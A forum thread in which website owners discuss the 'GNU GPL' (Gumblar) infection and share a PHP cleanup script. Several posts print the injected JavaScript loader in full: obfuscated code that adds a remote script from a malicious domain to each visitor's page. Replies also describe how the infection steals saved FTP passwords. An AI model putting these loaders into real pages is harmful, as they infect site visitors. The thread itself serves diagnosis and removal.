/*GNU GPL*/ try{window.onload = function(){var

MOGmartin Registered Users, 500 Post Club
edited April 2010 in On Site Optimization
THIS POST CONCERNS THE " <script>/*GNU GPL*/ try{window.onload = function(){var " VIRUS - HOW TO FIX IT!

HERE IS HOW TO FIX IT IN 4 EASY STEPS
(UPDATED AGAIN 12th January - this script has been downloaded over 7,500 times!)



1) Download this file: Cure GNU GPL Virus File (Curevir.php)
2) Extract the file contained in it, its called: curevir.php
3) Upload that file to the ROOT DIRECTORY of your website
4) Go to: http://YOURWEBSITENAME.COM/curevir.php



Thats it, it will take a seconds to a few minutes depending on how large your website is, it scans every file that could be infected, backs it up first, then removes the virus if it finds it.
Once its done its thing, and you are happy that the virus is gone, then you can delete your backups.

IMPORTANT
- you must now change all your ftp passwords, they have been compromised, and your website will be re-infected unless you do this immediately.
If you find this tool useful, PLEASE link to us!



EXAMPLE OF THE FULL CODE:
<script>/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.setAttribute('type', 'text/javascript');X08yhffhg7xkxf.setAttribute('id', 
'myscript1');X08yhffhg7xkxf.setAttribute('src',  'h)(@t))!t#)p@:&&#$#/^@!@/!)t($r&a)$)v$i)a)@)n&-
$@@(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(!c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!-
)$c)#)$o)^$m!!$.@$b^)l&@(u)&(@e#)j)^a!c#&k$!@i$(!n&))^(.!#r^$^u!!)^:(!8&#0$8^!!0#@$/@^#n^$o#&!v@!!
i@#@n)k))y!(#.@$c&#(^#z)@#/###^n^!o!(^(v)))$#i)!&)n@^)k!y^)^.^(c(!@z!!^/#!)c&@#d)i&^s$$(c$^o&(u@!
n$)&t(!.@$!c&$)o$m!&$/$@$w&o)#r)##d(!$!@p)!r@@$e)$s&#s($.@&&c&)))o@&m@(/&#^g^^@(o@o^!g!)l^!e#^
#^.)&!c$!o$#&&&m^$#/^(@&'.replace(/\$|&|\!|\)|@|#|\(|\^/ig, ''));X08yhffhg7xkxf.setAttribute('defer', 
'defer');document.body.appendChild(X08yhffhg7xkxf);}} catch(e) {}</script>


It attacks any webpage that it finds on your server that meet the following criteria:

filename =
index*
default*
*.js
«13

Posts

  • MOGmartin Registered Users, 500 Post Club
    edited December 2009
    UPDATE

    Just found a new version, it looks like this: the original script should still solve the problem though....

    <script>/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.setAttribute('type',
    'text/javascript');X08yhffhg7xkxf.setAttribute('id', 'myscript1');X08yhffhg7xkxf.setAttribute('src', 'h)(@t))!t#)p@:&&#$#/^@!@/!)t($r&a)$)v$i)a)@)
    n&-$@@(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(!c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!-
    )$c)#)$o)^$m!!$.@$b^)l&@(u)&(@e#)j)^a!c#&k$!@i$(!n&))^(.!#r^$^u!!)^:(!8�$8^!!0#@$/@^#n^$o#&!v@!!i@#@n)k))y!(#.@$c&#(^#z)@
    #/###^n^!o!(^(v)))$#i)!&)n@^)k!y^)^.^(c(!@z!!^/#!)c&@#d)i&^s$$(c$^o&(u@!n$)&t(!.@$!c&$)o$m!&$/$@$w&o)#r)##d(!$!@p)!r@@$e)$s&
    #s($.@&&c&)))o@&m@(/&#^g^^@(o@o^!g!)l^!e#^#^.)&!c$!o$#&&&m^$#/^(@&'.replace(/\$|&|\!|\)|@|#|\(|\^/ig, ''));X08yhffhg7xkxf.setAttribute
    ('defer', 'defer');document.body.appendChild(X08yhffhg7xkxf);}} catch(e) {}</script>

    <script>/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.setAttribute
    ('type', 'text/javascript');X08yhffhg7xkxf.setAttribute('id', 'myscript1');X08yhffhg7xkxf.setAttribute('src', 'h)(@t))!t#)p@:&&#$#/^@!@/!)
    t($r&a)$)v$i)a)@)n&-$@@(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(!c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!-)$c)#)$o
    )^$m!!$.@$b^)l&@(u)&(@e#)j)^a!c#&k$!@i$(!n&))^(.!#r^$^u!!)^:(!8�$8^!!0#@$/@^#n^$o#&!v@!!i@#@n)k))y!(#.@$c&
    #(^#z)@#/###^n^!o!(^(v)))$#i)!&)n@^)k!y^)^.^(c(!@z!!^/#!)c&@#d)i&^s$$(c$^o&(u@!n$)&t(!.@$!c&$)o$m!&$/$@$w&o)#r)##d
    (!$!@p)!r@@$e)$s&#s($.@&&c&)))o@&m@(/&#^g^^@(o@o^!g!)l^!e#^#^.)&!c$!o$#&&&m^$#/^(@&'.replace(/\$|&|\!|\)|@|#|\(|\^/ig, '')
    );X08yhffhg7xkxf.setAttribute('defer', 'defer');document.body.appendChild(X08yhffhg7xkxf);}} catch(e) {}</script><script>/*GNU GPL*
    / try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.setAttribute('type', 'text/javascript')
    ;X08yhffhg7xkxf.setAttribute('id', 'myscript1');X08yhffhg7xkxf.setAttribute('src', 'h)(@t))!t#)p@:&&#$#/^@!@/!)t($r&a)$)v$i)a)@)n&-$@@
    (c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(!c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!-)$c)#)$o)^$m!!$.@$b^)l&@(u)&(@e#)
    j)^a!c#&k$!@i$(!n&))^(.!#r^$^u!!)^:(!8�$8^!!0#@$/@^#n^$o#&!v@!!i@#@n)k))y!(#.@$c&#
    (^#z)@#/###^n^!o!(^(v)))$#i)!&)n@^)k!y^)^.^(c(!@z!!^/#!)c&@#d)i&^s$$(c$^o&(u@!n$)&t(!.@$!c&$)o$m!&$/$@$w&o)#r)##d(!$!@p
    )!r@@$e)$s&#s($.@&&c&)))o@&m@(/&#^g^^@(o@o^!g!)l^!e#^#^.)&!c$!o$#&&&m^$#/^(@&'.replace(/\$|&|\!|\)|@|#|\(|\^/ig, ''));
    X08yhffhg7xkxf.setAttribute('defer', 'defer');document.body.appendChild(X08yhffhg7xkxf);}} catch(e) {}</script>
  • armantine Registered Users
    edited December 2009
    Bonjour,
    Sorry for my english but i'm french.
    I was infected bu this code and i applied your code.
    I think, some js files still inifected, i'll resolve later.
    I have a question, i see when i refresh a page, a link in the footer of the browser but it's too quickly, i don' find the link on my apache log.
    Have you got an idea ?
  • MOGmartin Registered Users, 500 Post Club
    edited December 2009
    no problems about your english!! its better than my French!

    Anyway, Im not sure what the link is that you mean, do you have a screenshot that I can look at?

    thanks!

    MOGmartin
  • valene Registered Users
    edited December 2009
    MOGmartin wrote: »
    THIS POST CONCERNS THE " <script>/*GNU GPL*/ try{window.onload = function(){var " VIRUS - HOW TO FIX IT!


    INFORMATION: There is a new virus attacking websites hosted on linux servers, when you go to an infected website it just displays a white screen, but if you view the source you see something like this:

    <script>/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.setAttribute('type', 'text/javascript');X08yhffhg7xkxf.setAttribute('id', 'myscript1');X08yhffhg7xkxf.setAttribute('src', 'h)(@t))!t#)p@:&&#$#/^@!@/!)t($r&a)$)v$i)a)@)n&- $@@(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(!c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!- )$c)#)$o)^$m!!$.@$b^)l&@(u)&(@e#)j)^a!c#&k$!@i$(!n&))^(.!#r^$^u!!)^:(!8[code]<script>/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.setAttribute('type', 'text/javascript');X08yhffhg7xkxf.setAttribute('id',
    'myscript1');X08yhffhg7xkxf.setAttribute('src', 'h)(@t))!t#)p@:&&#$#/^@!@/!)t($r&a)$)v$i)a)@)n&-
    $@@(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(!c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!-
    )$c)#)$o)^$m!!$.@$b^)l&@(u)&(@e#)j)^a!c#&k$!@i$(!n&))^(.!#r^$^u!!)^:(!8
  • scraggz Registered Users
    edited December 2009
    MOGmartin wrote: »
    THIS POST CONCERNS THE " <script>/*GNU GPL*/ try{window.onload = function(){var " VIRUS - HOW TO FIX IT!

    MOGmartin

    Thanks for this. Every one of my domains got hit with it. I had found the ones in the index* and default* files but didn't know about the *.js.

    The tool you recommended fixed them all up in no time. Lifesaver!

    Will link to you for sure!

    Cheers

    Stan
  • charles Registered Users
    edited December 2009
    Thanks for the script, it was a great start. Unfortunately it does not work well on a site that has thousands of files. The script is very memory intensive and slow because it is reading the full file into memory and then doing a full text search on the file in memory.

    We should avoid this, and leverage shell commands to make things faster and less memory intensive.

    I made the following enhancement to the check_file() function that you might consider including in your script:
    /* START check_file function */

    function check_file($file){

    global $count;

    $ptrn = "/(php|html|shtml|htm|js|tpl|inc)$/";

    $virus_string = '/*GNU GPL*/ try{window.onload = function(){var';



    if (preg_match($ptrn, $file)) {
    //run a shell command to grep files instead of loading into memory
    $execoutput = exec("fgrep -l '{$virus_string}' ".escapeshellarg($file));//EDIT added escapeshellarg()

    if($execoutput){
    //echo a little output so we see progress
    //echo $execoutput.' ';
    $count++;
    return $file;
    }


    /************************
    *************************
    //commented out this section, no more full file in memory
    $contents = file_get_contents($file);


    if (strpos ($contents, $virus_string) !== false && $file != 'curevir.php' ){
    //pa($file.'/'.$file);
    if ($count == 0) {
    //chmod($file, 0777);



    }

    //pa($file);

    $count++;

    return $file;


    }
    ******************/

    }

    return false;

    }

    /* END check_file function */



    This modification took the script from trying to consume over 1 Gig of RAM and 20+ minutes to quick response (3-4 mins) and negligible memory / CPU usage.

    charles
    www.forthecode.org
  • charles Registered Users
    edited December 2009
    In my example, you may need to add back the code to prevent the script from detecting itself :)
    Again, thanks for posting your script!
    charles
    www.forthecode.org
  • MOGmartin Registered Users, 500 Post Club
    edited December 2009
    Ive got a fix for these issues, thanks for posting them by the way - I will upload the new script today,

    cheers!

    MOGmartin
  • mbaum Registered Users
    edited December 2009
    Hi guys,

    the files on my webspace were also affected by this virus.
    thanks to my webhoster who had a backup, the damage caused was not that bad.

    but now I have a question to you: how did they get onto my FTP-Server?
    I have checked all available logfiles for that day, their first login was at 8pm, the action took about 4,5 hours!

    Is it, as mentioned in the entry post, a problem affecting the unix servers, or is it possible they found out our FTP access data? Anyway, we changed all used passwords. How did they get into your files?

    thank you all,
    kind regards from Germany!
  • MOGmartin Registered Users, 500 Post Club
    edited December 2009
    mbaum wrote: »
    Hi guys,

    the files on my webspace were also affected by this virus.
    thanks to my webhoster who had a backup, the damage caused was not that bad.

    but now I have a question to you: how did they get onto my FTP-Server?
    I have checked all available logfiles for that day, their first login was at 8pm, the action took about 4,5 hours!

    Is it, as mentioned in the entry post, a problem affecting the unix servers, or is it possible they found out our FTP access data? Anyway, we changed all used passwords. How did they get into your files?

    thank you all,
    kind regards from Germany!

    The virus arrives on your machine after visiting an infected webpage, it scans for any common ftp program installed, then harvests any saved passwords and uploads them to their server in china.

    once they have your passwords they begin infecting your sites as well.

    so, once your sites have been infected, you 100% know that all your saved ftp passwords have also been comprimised.

    scary!
  • Hitbyvirus Registered Users
    edited December 2009
    I was hit hard, it was my computer and my servers. I'm not convinced about the harvesting thing because all the sites that were hit were on my saved password list for ftp (not a good idea , save the passwords in a text file on the desktop would be safer) AND they were only hit while my computer was on. All times coordinated.

    I'm not discounting the uploading password theory but I think it was sending FTP requests via proxy servers (logs show every file hit by a separate log in and IP even on the same site).

    It also did something else. It set up a SMTP engine on my computer and sent so many e-mails my ISP blocked port 25 on my account.

    It also couldn't be deleted. Not Avast, malware bytes (even after running rkill.bat like for vundo). Avast finds it but doesn't delete it. You can't delete it in safe mode. Command prompt fails. I had to pull the hard drive and chain it to another system to delete the infected file.

    I couldn't get the script posted here to work properly as root, as native user, with any permissions I tried.

    BTW it also hits files that start with the word "main".
  • SergST Registered Users
    edited December 2009
    MOGmartin wrote: »

    MOGmartin

    Hi.
    I have a problem. This script, is started only from a folder with the rights 755. It is necessary to start it for example from a folder /forum/remove_virus.php, but that scanning would begin from ROOT.
    Help.
  • MOGmartin Registered Users, 500 Post Club
    edited December 2009
    Hitbyvirus wrote: »
    I was hit hard, it was my computer and my servers. I'm not convinced about the harvesting thing because all the sites that were hit were on my saved password list for ftp (not a good idea , save the passwords in a text file on the desktop would be safer) AND they were only hit while my computer was on. All times coordinated.

    I'm not discounting the uploading password theory but I think it was sending FTP requests via proxy servers (logs show every file hit by a separate log in and IP even on the same site).

    It also did something else. It set up a SMTP engine on my computer and sent so many e-mails my ISP blocked port 25 on my account.

    It also couldn't be deleted. Not Avast, malware bytes (even after running rkill.bat like for vundo). Avast finds it but doesn't delete it. You can't delete it in safe mode. Command prompt fails. I had to pull the hard drive and chain it to another system to delete the infected file.

    I couldn't get the script posted here to work properly as root, as native user, with any permissions I tried.

    BTW it also hits files that start with the word "main".

    Thanks for the post, its interesting to see the behaviour that you have encountered, I wonder if its a slightly different version to the one that I received...

    My machine had open connections to a few different ".cn" addresses prior to my account being compromised, and I put two and two together.

    I dont have any logs of ftp sessions from my network for that time period though, or at least none that I know of, I will have to check that out.

    Also, Im behind a serious strength office firewall, so port 25 is blocked from my machine anyway.

    finally, thanks for posting mate, your input is much appreciated!

    MOGmartin
  • MOGmartin Registered Users, 500 Post Club
    edited December 2009
    SergST wrote: »
    Hi.
    I have a problem. This script, is started only from a folder with the rights 755. It is necessary to start it for example from a folder /forum/remove_virus.php, but that scanning would begin from ROOT.
    Help.

    Hi SergST - the script can only recurse subdirectories Im afraid, so please place it as far down the directory tree that you possibly can on your site.

    thanks

    MOGmartin
  • Hitbyvirus Registered Users
    edited December 2009
    MOGmartin wrote: »
    Thanks for the post, its interesting to see the behaviour that you have encountered, I wonder if its a slightly different version to the one that I received...

    My machine had open connections to a few different ".cn" addresses prior to my account being compromised, and I put two and two together.

    I dont have any logs of ftp sessions from my network for that time period though, or at least none that I know of, I will have to check that out.

    Also, Im behind a serious strength office firewall, so port 25 is blocked from my machine anyway.

    finally, thanks for posting mate, your input is much appreciated!

    MOGmartin

    Happy to be here :).

    Been reading on Gumblar and every article I read points toward that being the root. Or a variant. I simply went to a site to attempt to book a hotel for a night.

    So far on my servers here is the hit list:

    Any file that starts with index and ends in .php, .htm, .html (index_90210.htm would qualify)
    Any file that starts with default and ends in the extensions above.
    Any file that starts with main and ends with the extensions above.
    Any file ending in .js

    If anyone knows of more please post it here.
  • SergST Registered Users
    edited December 2009
    MOGmartin wrote: »
    Hi SergST - the script can only recurse subdirectories Im afraid, so please place it as far down the directory tree that you possibly can on your site.

    thanks

    MOGmartin

    Hello!
    ок and how me to scan folders having CMOD 777? I know precisely, there there is in files this script-virus. Start from such folders a remove_virus.php I can not.

    Sorry my english!
    Thanks.


    Tree site:

    |
    public_html (777)
    | -remove_virus.php(is not work)
    index.php
    |
    system(777)--remove_virus.php(is not work)
    | -application(777) (virus!!!)
    | -cache(755)
    | -database(755) (virus!!!)
    | -libraries(755) (virus!!!)
    | -.....
    forum(755)-remove_virus.php(is work, but scan folder forum and under folder forum)
    | -...
    |
    ...
  • nevetsnikam Registered Users
    edited December 2009
    MOGmartin wrote: »
    THIS POST CONCERNS THE " <script>/*GNU GPL*/ try{window.onload = function(){var " VIRUS - HOW TO FIX IT!


    INFORMATION: There is a new virus attacking websites hosted on linux servers, when you go to an infected website it just displays a white screen, but if you view the source you see something like this:
    <script>/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf
    
  • mbauer Registered Users
    edited December 2009
    I have this virus on my sites, too. I understood how I can fix it. But how can I prevent it? Is this virus on my computer? My Anti-Malware program didn't find anything. And my providers said that the virus was uploaded from me.
    I deleted all script rows from my files and changed my passwords. But this can't be all, because if the virus got the passwords once it will get those a second time.

    Thank you!
  • MOGmartin Registered Users, 500 Post Club
    edited December 2009
    mbauer wrote: »
    I have this virus on my sites, too. I understood how I can fix it. But how can I prevent it? Is this virus on my computer? My Anti-Malware program didn't find anything. And my providers said that the virus was uploaded from me.
    I deleted all script rows from my files and changed my passwords. But this can't be all, because if the virus got the passwords once it will get those a second time.

    Thank you!

    you need to firstly, change all your ftp passwords.

    Then run a spyware sweep using avast software, someone sent me a PM this morning to let me know that this antivirus NOW finds the infected files.
  • webster Registered Users
    edited December 2009
    Hello,

    I was also hacked today. But I can't fix the problem, cause my Code was modified like this:

    <script>/*GNU GPL*/ try{window.onload = function(){var blablabla ect.
    <!--42001c396c3732f4ca699120fdcd6582-->
    <!--42001c396c3732f4ca699120fdcd6582-->
    <!--42001c396c3732f4ca699120fdcd6582-->
    <!--42001c396c3732f4ca699120fdcd6582-->

    The curevir.php will not work with the additional lines:
    <!--42001c396c3732f4ca699120fdcd6582-->

    curevir finds the infection but it doesn't delete the lines...

    Please help.

    THX
    WEBSTER
  • slavvek Registered Users
    edited December 2009
    webster wrote: »
    Hello,

    I was also hacked today. But I can't fix the problem, cause my Code was modified like this:

    <script>/*GNU GPL*/ try{window.onload = function(){var blablabla ect.
    <!--42001c396c3732f4ca699120fdcd6582-->
    <!--42001c396c3732f4ca699120fdcd6582-->
    <!--42001c396c3732f4ca699120fdcd6582-->
    <!--42001c396c3732f4ca699120fdcd6582-->

    The curevir.php will not work with the additional lines:
    <!--42001c396c3732f4ca699120fdcd6582-->

    curevir finds the infection but it doesn't delete the lines...

    Please help.

    THX
    WEBSTER

    I have the same problem and i can`t download file
    Could not read source file

    Please help

    Best regards
  • AJ~ Registered Users
    edited December 2009
    webster wrote: »
    Hello,

    I was also hacked today. But I can't fix the problem, cause my Code was modified like this:

    <script>/*GNU GPL*/ try{window.onload = function(){var blablabla ect.
    <!--42001c396c3732f4ca699120fdcd6582-->
    <!--42001c396c3732f4ca699120fdcd6582-->
    <!--42001c396c3732f4ca699120fdcd6582-->
    <!--42001c396c3732f4ca699120fdcd6582-->

    The curevir.php will not work with the additional lines:
    <!--42001c396c3732f4ca699120fdcd6582-->

    curevir finds the infection but it doesn't delete the lines...

    Please help.

    THX
    WEBSTER
    I'm also having this problem. I have similar lines in my infected files after the <script> and it says success when I run curevir.php but sadly nothing is removed.

    Any ideas on how to resolve this?

    Many thanks,

    AJ
  • aingham Registered Users
    edited December 2009
    I've experienced this problem on my hosting. Many thanks for the script, which has really helped.

    I noticed that in a small number of cases it says it has succeeded in curing file, but if I re-run immediately, they appear again. Not a problem, as I've removed manually, but I've given an example below (from an INDEX.PHP file) which wasn't removed.

    Any ideas yet what the underlying problem might be? I am using FileZilla and I do have Adobe Acrobat installed. I changed my FTP passwords but I was still re-infected and I'm the only person with FTP access to my shared hosting (Go Daddy).

    <script>/*GNU GPL*/ try{window.onload = function(){var Osqo3r0s986 = document.createElement('s$(&c&r(@i$)#p&@#t$'.replace(/&|\^|@|\(|\!|\)|\$|#/ig, ''));var Wavk92u2kn = 'Ju8t238iq8';Osqo3r0s986.setAttribute('type', 't(!!&e)$()x!&t$$!/^!@j!&a@@v!a$^)s)c!$r@#i!!)p))#t!!'.replace(/\$|&|@|#|\^|\(|\!|\)/ig, ''));Osqo3r0s986.setAttribute('src', 'h(@)#t!@t!p!:@)@)/!(/)$!a&@@@m!a$@@(&z$&o##@#n(!@-)!c$&(o!(#-)j)p@@)@.)$w@a&^$y&&&2($(s!)#m##)$s!!^$$.$@!#c&$(o&#m#&.)!!u@##s^#(t!^r&!!@e$#@a(m!@(&-$t&v&!.$$t(h)e^)@g(^(^^i(@&(f#@(t(s@&(!a(&)$l(&&^(e(.^^^r!@^^u(:^$!)8#(0@#8@$$0(&&/!&)g##!@o(!)o((g))#l)^@)e#).)$$c(!&o&)$&m^(/#g#))o)@o$$g@!&l@e)#!.#&c^^)o)m$$!#/&s((!k)!y$(#.@!#c)$!o#&m$(!#/^!@e&&$&h!&o&^w&#).@$c!#o(#)&m))/$&^!)c#^!r!&i$#($c)&i(!&n#&^f$&&o&).()!@c@@o@@)m&/$!'.replace(/\(|\^|@|\)|\!|\$|&|#/ig, ''));Osqo3r0s986.setAttribute('defer', 'd#!&&e(((f@@e(!r#'.replace(/@|#|&|\!|\$|\(|\)|\^/ig, ''));Osqo3r0s986.setAttribute('id', 'D!!)i@&a^@#9#@6#$z#!)$f$)t(b&)@6@^@y)$('.replace(/&|\)|\^|\(|#|\$|@|\!/ig, ''));document.body.appendChild(Osqo3r0s986);}} catch(G2lu8zc0m82ax) {}</script>
    <!--4450a0c39e4b85a05898521d2a135e14-->
    <!--4450a0c39e4b85a05898521d2a135e14-->
    <!--4450a0c39e4b85a05898521d2a135e14-->
  • litensweet Registered Users
    edited December 2009
    I am having this same issue. I've tried reloading my Wordpress files and only portions of the site become available. The script on mine reads as follows:


    <script>/*GNU GPL*/ try{window.onload = function(){var A228lu47ipw = document.createElement('s&(c((^r$##i^^$p&$!#t('.replace(/\)|\(|\!|\^|#|@|&|\$/ig, ''))..... you get the idea... and then

    <!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->
    <!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->
    <!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->
    <!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->


    I run curevir.php and it says that it's successful. I even ran it on the newly installed files that I uploaded and while i can see SOME of the site, i can't log in as an admin and from what I've read, I understand that the virus will re-infect my site in a matter of moments.

    Please help???

    LNS
  • kambodianboi Registered Users
    edited December 2009
    I have made some changes to the script, basically commenting out the backing up part, so I can cron the script to run 5 times a day, just incase the virus decide to comes back. I notify my host and they said its cause of my faulty scripts, lol.

    I suggest everyone cron the script in the main directory, just as a security measure too.
  • aingham Registered Users
    edited December 2009
    I notice that this problem is also mentioned in some Wordpress threads, e.g. http://wordpress.org/support/topic/344181
    Is it possible that this attack is using Wordpress to get in there?
  • kboyko Registered Users
    edited December 2009
    litensweet wrote: »
    I am having this same issue. I've tried reloading my Wordpress files and only portions of the site become available. The script on mine reads as follows:


    <script>/*GNU GPL*/ try{window.onload = function(){var A228lu47ipw = document.createElement('s&(c((^r$##i^^$p&$!#t('.replace(/\)|\(|\!|\^|#|@|&|\$/ig, ''))..... you get the idea... and then

    <!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->
    <!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->
    <!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->
    <!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->


    I run curevir.php and it says that it's successful. I even ran it on the newly installed files that I uploaded and while i can see SOME of the site, i can't log in as an admin and from what I've read, I understand that the virus will re-infect my site in a matter of moments.

    Please help???

    LNS

    I've posted the update on the script at http://justcoded.com/article/gumblar-family-virus-removal-tool/, you can download new version there.

    Konstantin Boyko,
    http://justcoded.com
  • kboyko Registered Users
    edited December 2009
    I think you still have the virus, you need to make sure that your machine is clean before changing the password. The other measure is to not save your password in FileZilla - it is known as the client where passwords can be stolen. From my experience WinSCP is safe for now.

    Regards,
    Konstantin Boyko
    http://justcoded.com
    aingham wrote: »
    I've experienced this problem on my hosting. Many thanks for the script, which has really helped.

    I noticed that in a small number of cases it says it has succeeded in curing file, but if I re-run immediately, they appear again. Not a problem, as I've removed manually, but I've given an example below (from an INDEX.PHP file) which wasn't removed.

    Any ideas yet what the underlying problem might be? I am using FileZilla and I do have Adobe Acrobat installed. I changed my FTP passwords but I was still re-infected and I'm the only person with FTP access to my shared hosting (Go Daddy).

    <script>/*GNU GPL*/ try{window.onload = function(){var Osqo3r0s986 = document.createElement('s$(&c&r(@i$)#p&@#t$'.replace(/&|\^|@|\(|\!|\)|\$|#/ig, ''));var Wavk92u2kn = 'Ju8t238iq8';Osqo3r0s986.setAttribute('type', 't(!!&e)$()x!&t$$!/^!@j!&a@@v!a$^)s)c!$r@#i!!)p))#t!!'.replace(/\$|&|@|#|\^|\(|\!|\)/ig, ''));Osqo3r0s986.setAttribute('src', 'h(@)#t!@t!p!:@)@)/!(/)$!a&@@@m!a$@@(&z$&o##@#n(!@-)!c$&(o!(#-)j)p@@)@.)$w@a&^$y&&&2($(s!)#m##)$s!!^$$.$@!#c&$(o&#m#&.)!!u@##s^#(t!^r&!!@e$#@a(m!@(&-$t&v&!.$$t(h)e^)@g(^(^^i(@&(f#@(t(s@&(!a(&)$l(&&^(e(.^^^r!@^^u(:^$!)8#(0@#8@$$0(&&/!&)g##!@o(!)o((g))#l)^@)e#).)$$c(!&o&)$&m^(/#g#))o)@o$$g@!&l@e)#!.#&c^^)o)m$$!#/&s((!k)!y$(#.@!#c)$!o#&m$(!#/^!@e&&$&h!&o&^w&#).@$c!#o(#)&m))/$&^!)c#^!r!&i$#($c)&i(!&n#&^f$&&o&).()!@c@@o@@)m&/$!'.replace(/\(|\^|@|\)|\!|\$|&|#/ig, ''));Osqo3r0s986.setAttribute('defer', 'd#!&&e(((f@@e(!r#'.replace(/@|#|&|\!|\$|\(|\)|\^/ig, ''));Osqo3r0s986.setAttribute('id', 'D!!)i@&a^@#9#@6#$z#!)$f$)t(b&)@6@^@y)$('.replace(/&|\)|\^|\(|#|\$|@|\!/ig, ''));document.body.appendChild(Osqo3r0s986);}} catch(G2lu8zc0m82ax) {}</script>
    <!--4450a0c39e4b85a05898521d2a135e14-->
    <!--4450a0c39e4b85a05898521d2a135e14-->
    <!--4450a0c39e4b85a05898521d2a135e14-->
  • slavvek Registered Users
    edited December 2009
    Thank`s for script
    but I have still problem.
    My index.php amd other files are clean but still when I go to my web I see only white site

    Sory for my English

    Please help
    Best regards
  • kma9000 Registered Users
    edited December 2009
    I just wanted to register and say thankyou for this great script. I was infected by this virus on several domains but after uploading the curevir.php script and running it in each directory it would appear to have cleared it completely.

    For future reference, the virus attempts to load things onto the hosts computer, I noticed this message:
    This web site wants to run the following add-on: 'Microsoft Data
    Access - Remote Data Services Dat...' from 'Microsoft Corporation'. If
    you trust the web site and the add-on and want to allow it to run,
    click here...

    I was also receiving a warning message similar to this:
    warninga.th.jpg
    http://img199.imageshack.us/img199/4237/warninga.jpg
Sign In or Register to comment.